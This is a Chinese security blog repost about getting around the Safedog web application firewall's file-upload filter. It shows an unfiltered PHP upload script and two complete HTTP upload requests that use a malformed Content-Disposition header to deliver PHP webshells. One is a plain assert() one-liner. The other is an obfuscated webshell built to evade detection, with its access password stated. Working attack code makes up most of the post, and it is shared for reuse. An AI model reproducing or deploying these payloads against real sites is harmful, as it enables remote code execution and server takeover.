WEB安全

2017绕过最新安全狗上传

字号+ 作者:科拉实验室 来源:转载 2017-03-07 09:33 我要评论( )

首先贴出测试代码,这个是没有过滤文件类型的,我开启安全狗的上传拦截 ?php ?php if ( $_FILES [ file ] [ error ] 0 ) { echo Error: . $_FILES [ file ] [ erro......

首先贴出测试代码,这个是没有过滤文件类型的,我开启安全狗的上传拦截

<?php
<?php
if ($_FILES["file"]["error"] > 0)
  {
  echo "Error: " . $_FILES["file"]["error"] . "<br />";
  }
else
  {
  echo "Upload: " . $_FILES["file"]["name"] . "<br />";
  echo "Type: " . $_FILES["file"]["type"] . "<br />";
  echo "Size: " . ($_FILES["file"]["size"] / 1024) . " Kb<br />";
  echo "Stored in: " . $_FILES["file"]["tmp_name"];
  }
?>

我们先去直接上传一个PHP一句话木马测试:

 

已经被拦截了,然后我们继续测试

 

上传成功。

科拉实验室-绕过最新安全狗上传

贴出成功的数据包:

POST /upload.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/
Cookie: safedog-flow-item=886C7483
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------166791069611484
Content-Length: 341
 
-----------------------------166791069611484
Content-Disposition:*; name="file"; filename="AutoLoad.class.php"
Content-Type: application/octet-stream
 
<?php assert($_POST[cmda78]);?>
 
-----------------------------166791069611484
Content-Disposition: form-data; name="submit"
 
Submit
-----------------------------166791069611484--

但是我们的一句话木马并不免杀。我自己写了一个,分享给大家!

贴出数据包以及测试的一句话木马还有运行截图:

 

POST /upload.php HTTP/1.1
Host: 192.168.0.108
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.108/
Cookie: safedog-flow-item=886C7483
X-Forwarded-For: 8.8.8.8
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=---------------------------1574965867356
Content-Length: 1073
 
-----------------------------1574965867356
Content-Disposition: *; name="file"; filename="cora.php"
Content-Type: text/plain
 
<?php
$p = array('f'=&gt;'a',
#afffffffff
'pffff'=&gt;'s'/*223* 1*/,
'e'=&gt;'fffff',//FJKSJKFSNMFSSDSDS//D*SA/*DSA&amp;*$@&amp;$@&amp;(#*(
'lfaaaa'=&gt;'r',//FJKSJKFSNMFSSDSDS//D*SA/*DSA&amp;*$@&amp;$@&amp;(#*(;
'nnnnn'=&gt;'t'//&amp;$@&amp;(#*(;
);//&amp;$@&amp;(#*(;
$a = array_keys($p);//9*9*5656
@$_=$p['pffff'].#/*@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@*/
$p['pffff'].$a[2];
@$_=#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$p['f']./*-/*-*/$_.#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
$p['lfaaaa'].$p['nnnnn'];#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@$_#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
($_REQUEST[#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
'username'#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
#@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
]);
?>
-----------------------------1574965867356
Content-Disposition: form-data; name="submit"
 
Submit
-----------------------------1574965867356--

密码是:username //主要思路还是用了数组进行字符串的拼接。


本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/Web/580.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~